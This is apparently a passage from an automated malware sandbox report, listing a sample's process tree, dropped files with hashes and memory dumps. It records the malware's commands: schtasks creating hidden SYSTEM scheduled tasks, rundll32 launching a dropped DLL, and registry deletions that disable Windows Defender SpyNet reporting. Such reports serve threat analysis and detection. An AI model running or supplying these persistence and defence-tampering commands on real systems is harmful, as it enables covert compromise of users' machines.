C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ulJHerdNyNJKzGw2" /F /xml "C:\Program Files (x86)\vCYWhmhlU\fuRnhIw.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ulJHerdNyNJKzGw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ulJHerdNyNJKzGw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RRtdPhcgeMAKnR" /F /xml "C:\Program Files (x86)\gcyASImYjZBU2\EHRjqBf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DBZKNiGxmOsGA2" /F /xml "C:\ProgramData\QtEKgGNERTHTknVB\kmRvfci.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tMaUGjMWirHLUJOBi2" /F /xml "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR\jQdzAOm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YgCwwruigbnUpvnuIqJ2" /F /xml "C:\Program Files (x86)\gUXCkMfuWzCyC\vbpmRvB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AFcndnMIJqNXhoPDJ" /SC once /ST 09:35:55 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\LzrOtnkAyuDpOCzW\zTgfljcE\pBFwEpx.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "AFcndnMIJqNXhoPDJ"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ehnYTuGzyhWqfGFsn"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\LzrOtnkAyuDpOCzW\zTgfljcE\pBFwEpx.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\LzrOtnkAyuDpOCzW\zTgfljcE\pBFwEpx.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "AFcndnMIJqNXhoPDJ"3⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR\jQdzAOm.xmlFilesize
2KB
MD55279b722b74bd8382bc9080d4b013890
SHA136bdf648ae3231d0c0e9f98106533e08b382e1fd
SHA2561d62b29b0371808d4ebb0199e4bbc076e2f4d5ccc5a4f3df09ae37930051197e
SHA512ccf20a5d8edbfd2ea37d59f60db2aa87f5a733170b333bdad20bdc5ea9f32ff347fb6c8b9d1b84e0928b0311c56262c1b2c06c361155050f8d6ce87f3f713a6a
-
C:\Program Files (x86)\gUXCkMfuWzCyC\vbpmRvB.xmlFilesize
2KB
MD51daa22cc022d7ce90c18468840d9e4f1
SHA1030b9c2260248726ff9c7eba938564ce76c2cc47
SHA2561b254252708cba49576fa281759b7a0105e02da5e858993dc9c11221052586b8
SHA5124084df1424cd6a800a74ea7e3aac4e1ad30053d43c8416be1d1a2ea6e37812380cab25da582cd3d9b3b5d3cc609b66f3c99f3656856c920ae7436bbcec64a6e4
-
C:\Program Files (x86)\gcyASImYjZBU2\EHRjqBf.xmlFilesize
2KB
MD5cf6060cf5bd563427567b3dcaa4efd16
SHA1bf57bb50154ec360cfb851c07e3cab7cee858a83
SHA25635a3f0dfb831e6fae67cf8c339ecd181b6352e22f41fcbf074deec622a02f9d6
SHA51244810186ba23df21d51352a95bd500702c5784b10b34295c2369b8ab34f6a2b520ce7d0618611c07bd3a5c547d283d349ede8344250627ddeb4a8060a6a67295
-
C:\Program Files (x86)\vCYWhmhlU\fuRnhIw.xmlFilesize
2KB
MD5fc8e0c3864418f4027563b648562c201
SHA150a2147a546fe991f0aff2914b051db806d77311
SHA2567b2b873b628ec693d592b4e141ed1f52dbe46022836d921e5c1d6f1d0b3f0af9
SHA512dceb75e474bec4756b01fa7086114ce4e53d3d41355c7651d73cc7794398ff03bce53f9c14799cf47f8c942fd92b41fccfbd97bbe37c4380455705a83b2979be
-
C:\ProgramData\QtEKgGNERTHTknVB\kmRvfci.xmlFilesize
2KB
MD506e21d46225f3b812f943a559c3b8bb8
SHA1db66fc2866bf833c11c6c2dc620c4dc855e8b781
SHA2562491cc46fff35cadfddc4c78c34c5c87c8d10ed3aaf8b34795a3fabec356a3da
SHA5125d0312a1ab0231b3f2d71c861eb60b0edda8ec2e145ae9bb6470e3061e05f2696ef78d08b0c462b8b15dae62a9e2f71913817f8bfe5c1d1b0473491bbcc63b65
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
C:\Users\Admin\AppData\Local\Temp\7zS540.tmp\Install.exeFilesize
6.3MB
MD5908f64c2981debda15e24188f61d3e07
SHA161b9365716059084fb53364665b87df0bbbf2ea5
SHA256161c487addec818c7d20f9adf9c94261d311605cb0c01e46cc7b9b74e80c75ca
SHA51252183db4f08cc1b07b5cdf964cea596e8c7716fd0d4b533e4ebdc3adae03edd6e7462db00bf64b6b557b73464b0ebe8ad67bf29cda2db2bb8ec4aa2832ff6b7b
-
C:\Users\Admin\AppData\Local\Temp\7zS540.tmp\Install.exeFilesize
6.3MB
MD5908f64c2981debda15e24188f61d3e07
SHA161b9365716059084fb53364665b87df0bbbf2ea5
SHA256161c487addec818c7d20f9adf9c94261d311605cb0c01e46cc7b9b74e80c75ca
SHA51252183db4f08cc1b07b5cdf964cea596e8c7716fd0d4b533e4ebdc3adae03edd6e7462db00bf64b6b557b73464b0ebe8ad67bf29cda2db2bb8ec4aa2832ff6b7b
-
C:\Users\Admin\AppData\Local\Temp\7zSE19.tmp\Install.exeFilesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
C:\Users\Admin\AppData\Local\Temp\7zSE19.tmp\Install.exeFilesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\WaGVnmO.exeFilesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\WaGVnmO.exeFilesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD5313669c7714877e8056352e6a8bcc4a6
SHA164bd4029202315b6225f040f6ec9bf0d248448fe
SHA256875cd55f5901ab5e882ffab459a4838b52ba7978408fab50df503e4605788336
SHA5123aec154446a3e1e18471dd2fb9cc2d76d196abf118d67716634a07671c8ca0792cfaf1a894fd4ebeb9a89d1a94580fa92ae6b99e3fa6677fd03934be1093a7da
-
C:\Windows\Temp\LzrOtnkAyuDpOCzW\ASUEhtNmEGCZDbi\apHgcpf.exeFilesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
C:\Windows\Temp\LzrOtnkAyuDpOCzW\ASUEhtNmEGCZDbi\apHgcpf.exeFilesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
C:\Windows\Temp\LzrOtnkAyuDpOCzW\zTgfljcE\pBFwEpx.dllFilesize
6.2MB
MD5f0fad138bb903a81e0b9fd9edf631215
SHA137411e038b79a2b5112745205962363fdbf5c9a6
SHA256568d78fef0993fe7df30f552435b565b9c45213b0c9384c32f06d3eab294f53a
SHA512928a781ed9b11afb02c8bdca52d2739f11ab949aae488d9da63fb3f6d9b34a95646c21bc152541e50e558418abf78150e3caa55622e678d8d1369dff181c33f8
-
C:\Windows\Temp\LzrOtnkAyuDpOCzW\zTgfljcE\pBFwEpx.dllFilesize
6.2MB
MD5f0fad138bb903a81e0b9fd9edf631215
SHA137411e038b79a2b5112745205962363fdbf5c9a6
SHA256568d78fef0993fe7df30f552435b565b9c45213b0c9384c32f06d3eab294f53a
SHA512928a781ed9b11afb02c8bdca52d2739f11ab949aae488d9da63fb3f6d9b34a95646c21bc152541e50e558418abf78150e3caa55622e678d8d1369dff181c33f8
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
5KB
MD59b351c1584d60de8f69131f2512dfe63
SHA1aff1b35482345fcda0a921069ce159a7782cdb41
SHA25671ed914077f61b57a799a8933668fd6eaaf79b2d8df1462c10cb41ddcbba795f
SHA5122bc1064daea504997fb5035b2120e44cb924eca9323313eb941706b075b33e6969fb6a2e90f20164354506eb4166f1d6d3a1f2b08af404151cfa912360e0c1b2
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
memory/64-184-0x0000000000000000-mapping.dmp
-
memory/100-156-0x0000000000000000-mapping.dmp
-
memory/260-155-0x0000000000000000-mapping.dmp
-
memory/340-222-0x0000000000000000-mapping.dmp
-
memory/388-201-0x0000000000000000-mapping.dmp
-
memory/460-164-0x0000000003EA0000-0x00000000044C8000-memory.dmpFilesize
6.2MB
-
memory/460-163-0x0000000003830000-0x0000000003866000-memory.dmpFilesize
216KB
-
memory/460-162-0x0000000000000000-mapping.dmp
-
memory/460-165-0x0000000003D20000-0x0000000003D42000-memory.dmpFilesize
136KB
-
memory/460-166-0x0000000004700000-0x0000000004766000-memory.dmpFilesize
408KB
-
memory/460-167-0x0000000004770000-0x00000000047D6000-memory.dmpFilesize
408KB
-
memory/460-168-0x0000000004E10000-0x0000000004E2E000-memory.dmpFilesize
120KB
-
memory/620-209-0x0000000000000000-mapping.dmp
-
memory/932-205-0x0000000000000000-mapping.dmp
-
memory/1260-187-0x0000000000000000-mapping.dmp
-
memory/1392-188-0x0000000000000000-mapping.dmp
-
memory/1400-178-0x0000000000000000-mapping.dmp
-
memory/1408-173-0x0000000000000000-mapping.dmp
-
memory/1420-151-0x000001ED2F3B0000-0x000001ED2F3D2000-memory.dmpFilesize
136KB
-
memory/1420-153-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmpFilesize
10.8MB
-
memory/1420-154-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmpFilesize
10.8MB
-
memory/1484-197-0x0000000000000000-mapping.dmp
-
memory/1520-143-0x0000000000000000-mapping.dmp
-
memory/1580-212-0x0000000000000000-mapping.dmp
-
memory/1696-200-0x0000000000000000-mapping.dmp
-
memory/1704-202-0x0000000000000000-mapping.dmp
-
memory/1732-198-0x0000000000000000-mapping.dmp
-
memory/1736-190-0x0000000000000000-mapping.dmp
-
memory/1868-132-0x0000000000000000-mapping.dmp
-
memory/1876-208-0x0000000000000000-mapping.dmp
-
memory/1908-192-0x0000000000000000-mapping.dmp
-
memory/1968-191-0x0000000000000000-mapping.dmp
-
memory/1996-223-0x0000000000000000-mapping.dmp
-
memory/2016-194-0x0000000000000000-mapping.dmp
-
memory/2028-193-0x0000000000000000-mapping.dmp
-
memory/2116-172-0x0000000000000000-mapping.dmp
-
memory/2140-150-0x0000000000000000-mapping.dmp
-
memory/2172-175-0x0000000000000000-mapping.dmp
-
memory/2204-146-0x0000000000000000-mapping.dmp
-
memory/2260-174-0x0000000000000000-mapping.dmp
-
memory/2296-206-0x0000000000000000-mapping.dmp
-
memory/2436-179-0x0000000000000000-mapping.dmp
-
memory/2464-229-0x0000000005180000-0x0000000005205000-memory.dmpFilesize
532KB
-
memory/2464-242-0x0000000005900000-0x0000000005976000-memory.dmpFilesize
472KB
-
memory/2464-246-0x0000000006190000-0x000000000624C000-memory.dmpFilesize
752KB
-
memory/2464-233-0x0000000005890000-0x00000000058F7000-memory.dmpFilesize
412KB
-
memory/2488-183-0x0000000000000000-mapping.dmp
-
memory/2656-211-0x0000000000000000-mapping.dmp
-
memory/2660-135-0x0000000000000000-mapping.dmp
-
memory/2660-138-0x0000000010000000-0x0000000010D2B000-memory.dmpFilesize
13.2MB
-
memory/2888-176-0x0000000000000000-mapping.dmp
-
memory/3092-145-0x0000000000000000-mapping.dmp
-
memory/3112-159-0x0000000010000000-0x0000000010D2B000-memory.dmpFilesize
13.2MB
-
memory/3128-147-0x0000000000000000-mapping.dmp
-
memory/3136-144-0x0000000000000000-mapping.dmp
-
memory/3200-149-0x0000000000000000-mapping.dmp
-
memory/3220-220-0x0000000000000000-mapping.dmp
-
memory/3236-169-0x0000000000000000-mapping.dmp
-
memory/3404-182-0x0000000000000000-mapping.dmp
-
memory/3576-215-0x0000000000000000-mapping.dmp
-
memory/3596-221-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmpFilesize
10.8MB
-
memory/3596-219-0x00007FFD6C980000-0x00007FFD6D441000-memory.dmpFilesize
10.8MB
-
memory/3692-203-0x0000000000000000-mapping.dmp
-
memory/3740-186-0x0000000000000000-mapping.dmp
-
memory/3836-204-0x0000000000000000-mapping.dmp
-
memory/3960-210-0x0000000000000000-mapping.dmp
-
memory/3984-171-0x0000000000000000-mapping.dmp
-
memory/4048-142-0x0000000000000000-mapping.dmp
-
memory/4228-213-0x0000000000000000-mapping.dmp
-
memory/4264-177-0x0000000000000000-mapping.dmp
-
memory/4392-207-0x0000000000000000-mapping.dmp
-
memory/4468-170-0x0000000000000000-mapping.dmp
-
memory/4512-250-0x00000000019F0000-0x000000000271B000-memory.dmpFilesize
13.2MB
-
memory/4528-180-0x0000000000000000-mapping.dmp
-
memory/4636-181-0x0000000000000000-mapping.dmp
-
memory/4692-216-0x0000000000000000-mapping.dmp
-
memory/4864-141-0x0000000000000000-mapping.dmp
-
memory/4916-152-0x0000000000000000-mapping.dmp
-
memory/4976-148-0x0000000000000000-mapping.dmp
-
memory/4988-185-0x0000000000000000-mapping.dmp
-
memory/5056-199-0x0000000000000000-mapping.dmp
-
memory/5060-189-0x0000000000000000-mapping.dmp